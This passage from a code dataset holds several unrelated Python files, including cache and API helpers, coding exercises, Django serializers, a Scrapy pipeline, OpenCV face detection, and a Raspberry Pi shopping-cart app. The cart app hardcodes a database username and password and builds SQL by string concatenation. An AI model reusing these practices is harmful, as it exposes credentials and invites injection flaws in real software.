headers=headers)\n                return r.status_code, r.json()\n\n            elif method == \"POST\":\n                r = requests.post(url=url, data=data, headers=headers)\n                if r.status_code == 204:\n                    return r.status_code, \"\"\n\n                return r.status_code, r.json()\n            elif method == \"GET\":\n                r = requests.get(url=url, headers=headers)\n\n                return r.status_code, r.json()\n            else:\n                return self._handle_sirius_error(\n                    error_message=f\"Unable to send request to Sirius\",\n                    error_details=f\"Method {method} not allowed on Sirius route\",\n                )\n\n        except Exception as e:\n            return self._handle_sirius_error(\n                error_message=f\"Unable to send request to Sirius\", error_details=e\n            )\n\n    def _put_sirius_data_in_cache(self, key, data):\n        logger.info(f\"_put_sirius_data_in_cache\")\n        cache_name = self.request_caching_name\n\n        cache_ttl_in_seconds = self.request_caching_ttl * 60 * 60\n\n        data = json.dumps(data)\n\n        try:
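            # Cache the JSON-serialised payload under a namespaced key with a TTL (hours converted to seconds above), so stale Sirius responses expire automatically.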
self.cache.set(\n                name=f\"{cache_name}-{key}\", value=data, ex=cache_ttl_in_seconds\n            )\n            logger.info(f\"setting redis: {cache_name}-{key}\")\n        except Exception as e:\n            logger.error(f\"Unable to set cache: {cache_name}-{key}, error {e}\")\n\n    def _get_sirius_data_from_cache(self, key):\n\n        cache_name = self.request_caching_name\n\n        try:\n            logger.info(f\"getting redis: {cache_name}-{key}\")\n            if self.cache.exists(f\"{cache_name}-{key}\"):\n                status_code = 200\n                result = self.cache.get(f\"{cache_name}-{key}\")\n                result = json.loads(result)\n            else:\n                status_code = 500\n                result = None\n        except Exception as e:\n            logger.error(f\"Unable to get from cache: {cache_name}-{key}, error {e}\")\n            status_code = 500\n            result = None\n\n        return status_code, result\n","sub_path":"shared_code/sirius_service/opg_sirius_service/sirius_handler.py","file_name":"sirius_handler.py","file_ext":"py","file_size_in_byte":8685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574995282","text":"'''\nGiven an array of size n, find the majority element. The majority element is the element that appears more than n/2 times.\n\nYou may assume that the array is non-empty and the majority element always exists in the array.\n\nExample 1:\n\nInput: [3,2,3]\nOutput: 3\nExample 2:\n\nInput: [2,2,1,1,1,2,2]\nOutput: 2\n'''\n\n# O(n log n) time, O(1) space: after sorting, the majority element must occupy the middle index\ndef sol1(arr):\n    arr.sort()\n    return arr[len(arr) // 2]\n\n# O(n) time, O(1) space: Boyer-Moore majority vote -- the majority element survives pairwise cancellation\ndef sol2(arr):\n    count = 0\n    for val in arr:\n        if count == 0:\n            candidate = val\n        count += (1 if val == candidate else -1)\n    return candidate\n\narr = [2,2,1,1,1,2,2]\nprint(sol1(arr))\nprint(sol2(arr))","sub_path":"Easy/majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"493144727","text":"from rest_framework import serializers\nfrom Province.models import Province\nfrom district.models import District\nfrom city.models import City\n\n\nclass ProvinceSerializer(serializers.ModelSerializer):\n\n    class Meta:\n        model = Province\n        fields = ('pk',\n                  'introduction',\n                  'sinhalaName',\n                  'englishName',\n                  'tamilName',\n                  'area',\n                  'featureImage',\n                  'mapUrl')\n\n    featureImage = serializers.CharField(max_length=255, allow_blank=True)\n\n\n# province serializer by district\nclass RelatedProvinceSerializer(serializers.ModelSerializer):\n\n    class Meta:\n        model = Province\n        fields = ('pk',\n                  'englishName',)\n\n\nclass DistrictSerializer(serializers.ModelSerializer):\n\n    province = RelatedProvinceSerializer()\n    featureImage = serializers.CharField(max_length=255, allow_blank=True)\n\n    class Meta:\n        model = District\n        fields = ('pk',\n                  'introduction',\n                  'province',\n                  'sinhalaName',\n                  'englishName',\n                  'tamilName',\n                  'area',\n                  'featureImage',\n                  'mapUrl')\n\n\nclass CitySerializers(serializers.ModelSerializer):\n\n    class Meta:\n        model = City\n        fields = ('pk',\n                  'introduction',\n                  'sinhalaName',\n                  'englishName',\n                  'tamilName',\n                  'area',\n                  'featureImage',\n                  'mapUrl',\n                  'district')\n","sub_path":"api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"511704541","text":"# -*- coding: utf-8 -*-\n\"\"\"Upload files to server.
\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport webbrowser\n\nfrom Qt.QtCore import QEvent, Qt, Signal\nfrom Qt.QtWidgets import QStyle\n\nfrom wlf.uitools.template.dialog_with_dir import DialogWithDir\n\nfrom . import filetools\nfrom .__about__ import __version__\nfrom .control import Controller\nfrom .util import CONFIG\n\n\nclass Dialog(DialogWithDir):\n \"\"\"Main GUI dialog. \"\"\"\n\n instance = None\n upload_finished = Signal()\n icons = {\n 'toolButtonOpenDir': QStyle.SP_DirOpenIcon,\n 'dirButton': QStyle.SP_DialogOpenButton,\n 'syncButton': QStyle.SP_FileDialogToParent,\n None: QStyle.SP_FileDialogToParent,\n }\n uifile = filetools.path('dialog.ui')\n\n def __init__(self, parent=None):\n\n DialogWithDir.__init__(self, config=CONFIG, parent=parent)\n self.is_uploading = False\n self.version_label.setText('v{}'.format(__version__))\n\n # Set controller\n self.controller = Controller(self)\n self.controller.widget = self\n self.listView.setModel(self.controller.model)\n\n # Signals\n self.dirEdit.textChanged.connect(self.controller.change_root)\n self.listView.clicked.connect(self.on_view_item_clicked)\n self.listView.doubleClicked.connect(self.on_view_item_double_clicked)\n\n self.comboBoxPipeline.currentIndexChanged.connect(\n lambda index: self.on_pipeline_changed(self.comboBoxPipeline.itemText(index)))\n\n self.actionDir.triggered.connect(self.ask_dir)\n self.actionSync.triggered.connect(self.on_action_sync)\n self.actionSelectAll.triggered.connect(\n self.controller.select_all)\n self.actionReverseSelection.triggered.connect(\n self.controller.reverse_selection)\n self.actionReset.triggered.connect(\n self.controller.update_model)\n self.actionOpenDir.triggered.connect(\n lambda: webbrowser.open(CONFIG['DIR']))\n\n self.controller.root_changed.connect(self.on_root_changed)\n self.controller.upload_started.connect(self.on_upload_started)\n self.controller.upload_finished.connect(self.on_upload_finished)\n self.controller.model.dataChanged.connect(self.on_data_changed)\n\n # Recover state.\n self.controller.pipeline = CONFIG['PIPELINE']\n self.controller.change_root(self.directory)\n\n def on_action_sync(self):\n self.controller.upload(\n self.checkBoxSubmit.checkState(),\n self.lineEditNote.text())\n self.lineEditNote.clear()\n\n def _edits_key(self):\n return {\n 'dirEdit': 'DIR',\n 'checkBoxSubmit': 'IS_SUBMIT',\n 'checkBoxBurnIn': 'IS_BURN_IN',\n 'comboBoxPipeline': 'PIPELINE',\n }\n\n @property\n def dir_edit(self):\n \"\"\"Line edit for dir input. 
\"\"\"\n\n return self.dirEdit\n\n def on_root_changed(self, value):\n self.directory = value\n self.listView.setRootIndex(self.controller.source_index(value))\n\n def on_view_item_clicked(self, index):\n pass\n\n def on_view_item_double_clicked(self, index):\n if self.controller.model.is_dir(index):\n self.controller.change_root(index)\n else:\n self.controller.open_index(index, self.checkBoxBurnIn.checkState())\n\n def on_pipeline_changed(self, pipeline):\n self.controller.change_pipeline(pipeline)\n\n def on_data_changed(self):\n model = self.controller.model\n states = [model.data(i, Qt.CheckStateRole) for i in model.indexes()]\n checked_count = len([i for i in states if i == Qt.Checked])\n total_count = len(states)\n self.labelCount.setText('{}/{}'.format(checked_count, total_count))\n self.syncButton.setEnabled(not self.is_uploading and checked_count)\n\n def on_upload_started(self):\n self.is_uploading = True\n self.syncButton.setEnabled(False)\n\n def on_upload_finished(self):\n self.is_uploading = False\n self.activateWindow()\n\n def event(self, event):\n \"\"\"Override. \"\"\"\n\n if event.type() == QEvent.StatusTip:\n self.statusBar.showMessage(event.tip())\n return super(Dialog, self).event(event)\n","sub_path":"cgtwq_uploader/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286683596","text":"def replaceSpaceWithPacent20(string):\n spaceCount = 0\n for ch in string:\n if (ch==\" \"):\n spaceCount += 1\n table = [None]*(len(string)+spaceCount*2)\n i = 0\n for ch in string:\n if (ch != \" \"):\n table[i] = ch\n i += 1\n else:\n table[i] = \"%\"\n table[i+1] = \"2\"\n table[i+2] = \"0\"\n i += 3\n return \"\".join(table)\n\nif __name__ == \"__main__\":\n print(replaceSpaceWithPacent20(\"Mr John Smith \"))\n ","sub_path":"AlgorithmStudy/1-3.py","file_name":"1-3.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"447964470","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport csv\n\nfrom .items import XnkbItem, XnksItem, XnzyItem\n\n\nclass XnPipeline(object):\n # 定义一个集合去重\n # self.wys = set()\n\n def __init__(self):\n # 打开文件,指定方式为写,利用newline=''参数把csv写数据时产生的空行消除\n self.file_xnkb = open('XNKB.csv', 'w', newline='', encoding='utf-8-sig')\n self.file_xnks = open('XNKS.csv', 'w', newline='', encoding='utf-8-sig')\n self.file_xnzy = open('XNZY.csv', 'w', newline='', encoding='utf-8-sig')\n # 设置文件第一行的字段名,注意要跟spider传过来的字典item的key名称相同\n self.fieldnames_xnkb = ['Class', 'Component', 'Section', 'Mode', 'Day', 'Time', 'Facility',\n 'Location', 'Weeks', 'Instructor']\n self.fieldnames_xnks = ['Day', 'Date', 'StartTime', 'EndTime', 'Course', 'Paper', 'Location', 'Materials']\n self.fieldnames_xnzy = ['title', 'time', 'name']\n # 指定文件的写入方式为csv字典写入,参数1为指定具体文件,参数2为指定字段名\n self.writer_xnkb = csv.DictWriter(self.file_xnkb, fieldnames=self.fieldnames_xnkb)\n self.writer_xnks = csv.DictWriter(self.file_xnks, fieldnames=self.fieldnames_xnks)\n self.writer_xnzy = csv.DictWriter(self.file_xnzy, fieldnames=self.fieldnames_xnzy)\n # 写入第一行字段名,因为只要写入一次,所以文件放在__init__里面\n self.writer_xnkb.writeheader()\n self.writer_xnks.writeheader()\n self.writer_xnzy.writeheader()\n\n def process_item(self, item, spider):\n # content = 
json.dumps(dict(item), ensure_ascii=False) + '\\n'\n        # self.file.write(content)\n        # Write the concrete values passed over from the spider\n        if isinstance(item, XnkbItem):\n\n            self.writer_xnkb.writerow(item)\n\n        elif isinstance(item, XnksItem):\n\n            self.writer_xnks.writerow(item)\n\n        elif isinstance(item, XnzyItem):\n\n            self.writer_xnzy.writerow(item)\n\n        return item\n\n    def __del__(self):\n        self.file_xnkb.close()\n        self.file_xnks.close()\n        self.file_xnzy.close()\n","sub_path":"XN/XN/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"33863493","text":"import pygame\r\nimport numpy as np\r\nimport time\r\nimport io\r\nimport os\r\nimport sys\r\nimport socket\r\nimport serial\r\nimport threading\r\nimport scipy.misc\r\nimport pyodbc\r\nimport requests\r\nimport RPi.GPIO as GPIO\r\nfrom PIL import Image\r\nfrom picamera import PiCamera\r\n\r\nSWITCH=20\r\nENTER=21\r\nGPIO.setmode(GPIO.BCM)\r\nGPIO.setup(SWITCH, GPIO.IN)\r\nGPIO.setup(ENTER, GPIO.IN)\r\nPyTorch_REST_API_URL = 'http://7c605c99.ngrok.io/predict'\r\nprint(\"out here\")\r\ndsn = 'rpitestsqlserverdatasource'\r\nuser = 'deng-fat@deng-fat-goshopping'\r\npassword = 'TJG1ul3au4a83'\r\ndatabase = 'Shopping_Mall_Example'\r\nconnString = 'DSN={0};UID={1};PWD={2};DATABASE={3};'.format(dsn,user,password,database)\r\nconn = pyodbc.connect(connString)\r\ncursor = conn.cursor()\r\ntry:\r\n    # Python2\r\n    from urllib2 import urlopen\r\nexcept ImportError:\r\n    # Python3\r\n    from urllib.request import urlopen\r\n\r\n# machine params \r\nos.environ['SDL_VIDEO_WINDOW_POS'] = '8, 30'\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 680\r\nMystate = 0\r\n# params\r\nHEIGHT = SCREEN_HEIGHT - 75\r\nWIDTH = HEIGHT * 4 // 3#SCREEN_WIDTH - 16\r\nmy_pos = None\r\nitem_now = None\r\nitem_list = [ ['', 0, 0] for i in range(0, 21)]\r\ntotal = 0\r\n\r\n#background image\r\nhome_bg = pygame.image.load('pictures/home_bg.png')\r\nmap_bg = pygame.image.load('pictures/map_bg.png')\r\ncar_bg = pygame.image.load('pictures/car_bg.png')\r\ninfo_bg = pygame.image.load('pictures/info_bg.png')\r\ncab1_bg = pygame.image.load('pictures/cab1_bg.png')\r\ncab2_bg = pygame.image.load('pictures/cab2_bg.png')\r\ncab3_bg = pygame.image.load('pictures/cab3_bg.png')\r\ncab4_bg = pygame.image.load('pictures/cab4_bg.png')\r\n\r\n#item icon\r\nscan_true = pygame.image.load('pictures/item_scan1.png')\r\nscan_false = pygame.image.load('pictures/item_scan0.png')\r\npos_true = pygame.image.load('pictures/item_pos1.png')\r\npos_false = pygame.image.load('pictures/item_pos0.png')\r\ninfo_true = pygame.image.load('pictures/item_info1.png')\r\ninfo_false = pygame.image.load('pictures/item_info0.png')\r\nmap_true = pygame.image.load('pictures/item_map1.png')\r\nmap_false = pygame.image.load('pictures/item_map0.png')\r\ncar_true = pygame.image.load('pictures/item_car1.png')\r\ncar_false = pygame.image.load('pictures/item_car0.png')\r\naddcar_true = pygame.image.load('pictures/item_addcar1.png')\r\naddcar_false = pygame.image.load('pictures/item_addcar0.png')\r\ncab_true = pygame.image.load('pictures/item_shelf1.png')\r\ncab_false = pygame.image.load('pictures/item_shelf0.png')\r\nhome_true = pygame.image.load('pictures/item_home1.png')\r\nhome_false = pygame.image.load('pictures/item_home0.png')\r\nmy_icon = pygame.image.load('pictures/my.png')\r\ngoal_icon = pygame.image.load('pictures/goal.png')\r\n\r\ndef keyboard_control():\r\n    signal = 0\r\n    keys = pygame.key.get_pressed()\r\n    if keys[pygame.K_UP]:
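        # NOTE (editor): 'command' is not defined anywhere in this file -- presumably a signal mapping such as {'UP': ..., 'RIGHT': ...} supplied by code omitted from this snippet; keyboard_control() also appears unused in the visible code, so this is treated as an assumption.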
signal = command['UP']\r\n elif keys[pygame.K_RIGHT]:\r\n signal = command['RIGHT']\r\n return signal\r\n \r\n\r\n \r\ndef Home():\r\n #Home page: can go to scan, pos, map, car items\r\n\r\n global Mystate, windowSurface\r\n # some definition\r\n Home_state = {'SCAN': 0, 'MAP': 1, 'CAR': 2, 'POS': 3}\r\n\r\n Mystate = 0 #reset mystate\r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface\r\n while True:\r\n #get keyboard input\r\n pygame.time.wait(100)\r\n if GPIO.input(ENTER) == 0:#enter\r\n if Mystate == Home_state['SCAN']:\r\n Scan()\r\n elif Mystate == Home_state['MAP']:\r\n Map()\r\n elif Mystate == Home_state['CAR']:\r\n Car()\r\n elif Mystate == Home_state['POS']:\r\n Pos()\r\n elif GPIO.input(SWITCH) == 0:#switch\r\n Mystate = (Mystate+1)%4\r\n\r\n #init items\r\n background = home_bg\r\n scan_icon = scan_true if Mystate == Home_state['SCAN'] else scan_false\r\n map_icon = map_true if Mystate == Home_state['MAP'] else map_false\r\n car_icon = car_true if Mystate == Home_state['CAR'] else car_false\r\n pos_icon = pos_true if Mystate == Home_state['POS'] else pos_false\r\n font = pygame.font.SysFont(\"arial\", 30)\r\n if Mystate == Home_state['SCAN']:\r\n text = font.render(\"scan item\", True, (50,50,50))\r\n elif Mystate == Home_state['MAP']:\r\n text = font.render(\"check map\", True, (50,50,50))\r\n elif Mystate == Home_state['CAR']:\r\n text = font.render(\"check cart\", True, (50,50,50))\r\n elif Mystate == Home_state['POS']:\r\n text = font.render(\"get position\", True, (50,50,50))\r\n \r\n # build surface\r\n windowSurface.blit(background, (0, 0))\r\n windowSurface.blit(scan_icon, (200, 505))\r\n windowSurface.blit(map_icon, (300, 495))\r\n windowSurface.blit(car_icon, (400, 500))\r\n windowSurface.blit(pos_icon, (500, 500))\r\n windowSurface.blit(text, (600, 500))\r\n pygame.display.update()\r\n pygame.event.pump()\r\n\r\ndef Map():\r\n #Map page: can go to pos, info, cabinet, home items\r\n\r\n global Mystate, windowSurface, goal, my_pos\r\n # some definition\r\n Map_state = {'HOME': 0, 'INFO': 1, 'CAB': 2, 'POS': 3}\r\n\r\n Mystate = 0 #reset mystate\r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface\r\n while True:\r\n #get keyboard input\r\n pygame.time.wait(100)\r\n if GPIO.input(ENTER) == 0:\r\n if Mystate == Map_state['HOME']:\r\n my_pos = None\r\n Home()\r\n elif Mystate == Map_state['INFO']:\r\n my_pos = None\r\n Info()\r\n elif Mystate == Map_state['CAB']:\r\n Cab()\r\n elif Mystate == Map_state['POS']:\r\n my_pos = None\r\n Pos()\r\n elif GPIO.input(SWITCH) == 0:\r\n Mystate = (Mystate+1)%4\r\n #check whether the goal is exist\r\n if item_now is None:\r\n if Mystate == Map_state['INFO'] or Mystate == Map_state['CAB']:\r\n Mystate = Map_state['POS']\r\n\r\n #init items\r\n background = map_bg\r\n home_icon = home_true if Mystate == Map_state['HOME'] else home_false\r\n info_icon = info_true if Mystate == Map_state['INFO'] else info_false\r\n cab_icon = cab_true if Mystate == Map_state['CAB'] else cab_false\r\n pos_icon = pos_true if Mystate == Map_state['POS'] else pos_false\r\n font = pygame.font.SysFont(\"arial\", 25)\r\n if Mystate == Map_state['HOME']:\r\n text = font.render(\"Home\", True, (0,0,225))\r\n elif Mystate == Map_state['INFO']:\r\n text = font.render(\"item information\", True, (0,0,225))\r\n elif Mystate == Map_state['CAB']:\r\n text = font.render(\"see the cabinet\", True, (0,0,225))\r\n elif Mystate == Map_state['POS']:\r\n text = font.render(\"get position\", True, (0,0,225))\r\n \r\n # build 
surface\r\n windowSurface.blit(background, (0, 0))\r\n windowSurface.blit(home_icon, (200, 500))\r\n if item_now is not None:\r\n windowSurface.blit(info_icon, (300, 500))\r\n windowSurface.blit(cab_icon, (400, 500))\r\n windowSurface.blit(goal_icon, (item_now[6], item_now[7]))\r\n if my_pos is not None:\r\n windowSurface.blit(my_icon, (my_pos[0], my_pos[1]))\r\n windowSurface.blit(pos_icon, (500, 500))\r\n windowSurface.blit(text, (600, 500))\r\n pygame.display.update()\r\n pygame.event.pump()\r\n\r\n \r\ndef Scan():\r\n global item_now\r\n global Mystate, windowSurface\r\n # some definition\r\n Mystate = 0 #reset mystate\r\n \r\n with PiCamera() as camera:\r\n camera.start_preview()\r\n \r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface.\r\n pygame.display.update()\r\n pygame.event.pump()\r\n \r\n while True:\r\n #get keyboard input\r\n pygame.time.wait(50) \r\n if GPIO.input(ENTER) == 0:\r\n break\r\n pygame.event.pump() \r\n \r\n time.sleep(1)\r\n camera.capture('fat.jpg') \r\n im = image = open('fat.jpg', 'rb').read()\r\n payload = {'image': im}\r\n\r\n # Submit the request.\r\n r = requests.post(PyTorch_REST_API_URL, files=payload).json()\r\n\r\n # Ensure the request was successful.\r\n if r['success']:\r\n # Loop over the predictions and display them.\r\n for (i, result) in enumerate(r['predictions']):\r\n print('{}. {}: {:.4f}'.format(i + 1, result['label'],\r\n result['probability']))\r\n print(result['label'])\r\n # Otherwise, the request failed.\r\n else:\r\n print('Request failed')\r\n \r\n mapping = ['computer', 'green bottle', 'corrector', 'nail clipper', 'medicine', 'mouse',\\\r\n 'soap', 'baseball', 'book', 'blue bottle', 'glove', 'chopping board', 'white scissor',\\\r\n 'pillow', 'apple juice', 'umbrella', 'tea pot', 'shampoo', 'dinasour', 'pooh', 'hat']\r\n string = mapping[int(result['label'])]\r\n string2 = \"select * FROM Item WHERE(Item_Name='\"+string+\"');\"\r\n cursor.execute(string2)\r\n item_now = cursor.fetchone()\r\n print(item_now)\r\n Info()\r\n \r\ndef Pos():\r\n global my_pos, Mystate, windowSurface\r\n with PiCamera() as camera:\r\n camera.start_preview()\r\n \r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface.\r\n pygame.display.update()\r\n pygame.event.pump()\r\n \r\n while True:\r\n #get keyboard input\r\n pygame.time.wait(50) \r\n if GPIO.input(ENTER) == 0:\r\n break\r\n pygame.event.pump() \r\n \r\n time.sleep(1)\r\n camera.capture('fat.jpg') \r\n im = image = open('fat.jpg', 'rb').read()\r\n payload = {'image': im}\r\n\r\n # Submit the request.\r\n r = requests.post(PyTorch_REST_API_URL, files=payload).json()\r\n\r\n # Ensure the request was successful.\r\n if r['success']:\r\n # Loop over the predictions and display them.\r\n for (i, result) in enumerate(r['predictions']):\r\n print('{}. 
{}: {:.4f}'.format(i + 1, result['label'],\r\n result['probability']))\r\n print(result['label'])\r\n # Otherwise, the request failed.\r\n else:\r\n print('Request failed')\r\n \r\n mapping = ['computer', 'green bottle', 'corrector', 'nail clipper', 'medicine', 'mouse',\\\r\n 'soap', 'baseball', 'book', 'blue bottle', 'glove', 'chopping board', 'white scissor',\\\r\n 'pillow', 'apple juice', 'umbrella', 'tea pot', 'shampoo', 'dinasour', 'pooh', 'hat']\r\n string = mapping[int(result['label'])]\r\n string2 = \"select * FROM Item WHERE(Item_Name='\"+string+\"');\"\r\n cursor.execute(string2)\r\n item_new = cursor.fetchone()\r\n my_pos = [item_new[6], item_new[7]]\r\n Map()\r\n\r\ndef Info():\r\n #Info page: can go to map, addcar, scan, home items\r\n\r\n global Mystate, windowSurface, item_now, item_list, total\r\n # some definition\r\n Info_state = {'HOME': 0, 'MAP': 1, 'SCAN': 2, 'CAR': 3}\r\n\r\n Mystate = 0 #reset mystate\r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface.\r\n #get image first\r\n item_url = item_now[4]\r\n item_str = urlopen(item_url).read()\r\n item_file = io.BytesIO(item_str)\r\n image = pygame.image.load(item_file)\r\n while True:\r\n #get keyboard input\r\n if GPIO.input(ENTER) == 0:\r\n if Mystate == Info_state['HOME']:\r\n Home()\r\n elif Mystate == Info_state['MAP']:\r\n Map()\r\n elif Mystate == Info_state['SCAN']:\r\n Scan()\r\n elif Mystate == Info_state['CAR']:\r\n if item_list[0][2] == 0:\r\n item_list[0] = [item_now[0], item_now[1], 1]\r\n else:\r\n item_list[0][2]+=1\r\n total += item_now[1]\r\n Car()\r\n elif GPIO.input(SWITCH) == 0:\r\n Mystate = (Mystate+1)%4\r\n\r\n #init items\r\n background = info_bg\r\n home_icon = home_true if Mystate == Info_state['HOME'] else home_false\r\n map_icon = map_true if Mystate == Info_state['MAP'] else map_false\r\n scan_icon = scan_true if Mystate == Info_state['SCAN'] else scan_false\r\n car_icon = addcar_true if Mystate == Info_state['CAR'] else addcar_false\r\n font = pygame.font.SysFont(\"arial\", 30)\r\n if Mystate == Info_state['HOME']:\r\n text = font.render(\"Home\", True, (50,50,50))\r\n elif Mystate == Info_state['MAP']:\r\n text = font.render(\"search location\", True, (50,50,50))\r\n elif Mystate == Info_state['SCAN']:\r\n text = font.render(\"scan again\", True, (50,50,50))\r\n elif Mystate == Info_state['CAR']:\r\n text = font.render(\"add to cart\", True, (50,50,50))\r\n #put data to surface\r\n name = font.render(\"Name: \" + item_now[0], True, (0, 0, 255))\r\n price = font.render(\"Price: \" + str(item_now[1]), True, (0,0,255))\r\n remain = font.render(\"Remain: \"+ str(item_now[2]), True, (0,0,225))\r\n number = font.render(\"buying number in last week: \" + str(item_now[3]), True, (0,0,225))\r\n \r\n # build surface\r\n windowSurface.blit(background, (0, 0))\r\n windowSurface.blit(home_icon, (200, 500))\r\n windowSurface.blit(map_icon, (300, 500))\r\n windowSurface.blit(scan_icon, (400, 500))\r\n windowSurface.blit(car_icon, (500, 500))\r\n windowSurface.blit(text, (600, 500))\r\n windowSurface.blit(name, (450, 150))\r\n windowSurface.blit(price, (450, 200))\r\n windowSurface.blit(remain, (450, 250))\r\n windowSurface.blit(number, (450, 300))\r\n windowSurface.blit(image, (0, 150)) \r\n pygame.display.update()\r\n pygame.event.pump()\r\n\r\ndef Car():\r\n #Car page: can only go to home\r\n\r\n global Mystate, windowSurface, total, item_now, item_list\r\n\r\n Mystate = 0 #reset mystate\r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface\r\n while 
True:\r\n        #get keyboard inputs\r\n        pygame.time.wait(200)\r\n        if GPIO.input(ENTER) == 0:\r\n            Home()\r\n        #init items\r\n        background = car_bg\r\n        home_icon = home_true \r\n        font = pygame.font.SysFont(\"arial\", 30)\r\n        text = font.render(\"Home\", True, (0,0,255))\r\n        \r\n        \r\n        # build surface\r\n        windowSurface.blit(background, (0, 0))\r\n        windowSurface.blit(home_icon, (200, 500))\r\n        windowSurface.blit(text, (400, 500))\r\n        if total != 0:\r\n            string = 'Name: number: price:'\r\n            str1 = font.render(string, True, (50, 50, 50))\r\n            windowSurface.blit(str1, (200, 150))\r\n            count = 0\r\n            for i in range(21):\r\n                count+=1\r\n                if item_list[i][2] != 0:\r\n                    string = item_list[i][0] + ' ' + str(item_list[i][2]) + ' ' + str(item_list[i][1]*item_list[i][2])\r\n                    str1 = font.render(string, True, (50,50,50))\r\n                    windowSurface.blit(str1, (200, 150+count*50))\r\n        pygame.display.update()\r\n        pygame.event.pump()\r\n\r\ndef Cab():\r\n    #cab page: \r\n    global Mystate, windowSurface\r\n\r\n    Mystate = 0 #reset mystate\r\n    windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface\r\n    while True:\r\n        pygame.time.wait(100)\r\n        if GPIO.input(ENTER) == 0:\r\n            Map()\r\n        background = cab1_bg\r\n        map_icon = map_true\r\n        font = pygame.font.SysFont(\"arial\", 30)\r\n        text = font.render(\"back to map\", True, (50, 50, 50))\r\n        # build surface\r\n        windowSurface.blit(background, (0, 0))\r\n        windowSurface.blit(map_icon, (200, 500))\r\n        windowSurface.blit(text, (400, 500))\r\n        pygame.display.update()\r\n        pygame.event.pump()\r\n\r\n\r\n\r\n\r\npygame.init()\r\nwindowSurface = pygame.display.set_mode((WIDTH, HEIGHT))\r\nHome()\r\n","sub_path":"Smart_cart/shop_old_1.py","file_name":"shop_old_1.py","file_ext":"py","file_size_in_byte":16184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"38258298","text":"import json\nimport os.path\nimport sys\n\n\ndef load_data(filepath):\n    with open(filepath, 'rb') as file:\n        return json.loads(file.read())\n\n\ndef pretty_print_json(decoded_json):\n    return json.dumps(\n        decoded_json,\n        sort_keys=True,\n        indent=4,\n        ensure_ascii=False,\n    )\n\n\nif __name__ == '__main__':\n    if len(sys.argv) < 2:\n        exit('need filename')\n    user_filepath = sys.argv[1]\n    if not os.path.exists(user_filepath):\n        exit('need correct file path')\n    loaded_json = load_data(user_filepath)\n    if not loaded_json:\n        exit('can not load the json')\n    print(pretty_print_json(loaded_json))\n","sub_path":"pprint_json.py","file_name":"pprint_json.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48204859","text":"import cv2\nimport numpy as np\npic=cv2.imread('E:\\\\pycharm_object\\\\tensorflow_opencv\\\\nba_test.jpg')\n# Face data: the cascade classifier takes the face-feature data and returns an object that can detect faces\ndetector=cv2.CascadeClassifier('E:\\\\pycharm_object\\\\tensorflow_opencv\\\\face_detection.xml')\n# Convert to grayscale\ngray=cv2.cvtColor(pic,code=cv2.COLOR_BGR2GRAY)\n# Use the trained detector to find face regions\n# The last two parameters are the defaults; adjust them to tune detection accuracy\nface_zone=detector.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=3)\nfor x,y,w,h in face_zone:\n    # Draw a rectangle around the face; only the top-left and bottom-right corners are needed\n    cv2.rectangle(pic,pt1=(x,y),pt2=(x+w,y+h),color=[0,255,0],thickness=2)\n    # Draw a circle around the face; this needs the centre coordinates and the radius
cv2.circle(pic,center=(x+w//2,y+h//2),radius=w//2,color=[0,0,255],thickness=2)\n\n# Detection ran on the grayscale image; the results are drawn on the colour image\ncv2.imshow('pic',pic)\ncv2.imwrite('./nba_test_face_detection_result.jpg',pic)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"test_opencv/face_detection_test.py","file_name":"face_detection_test.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"330539249","text":"from __future__ import division\r\nimport sys,datetime,time,pygal,os\r\nfrom random import random\r\nfrom hashlib import md5\r\n\r\ndef try_float(x):\r\n    try:\r\n        return float(x)\r\n    except:\r\n        return x\r\n\r\ndef now():\r\n    return datetime.datetime.today()\r\n\r\ndef new_id():hasher = md5(); hasher.update(str(now())); return hasher.hexdigest()\r\n\r\nSIM_TIME, SIM_NODES, SIM_TITLE = map(try_float,sys.argv[1:])\r\n\r\nglobal ROUTES, VALVES, CARS, here, slash\r\n\r\nROUTES = []; VALVES = []; CARS = []\r\n\r\nhere = os.getcwd()\r\nif \"\\\\\" in here:\r\n    slash=\"\\\\\"\r\nelse:\r\n    slash=\"/\"\r\nhere+=slash\r\n\r\ndef divider(t,nodes):\r\n    div = t/nodes; return [node*div for node in xrange(int(nodes))]\r\n\r\ndef compute_nodes(route):\r\n    # a route is a quartic curve\r\n    return 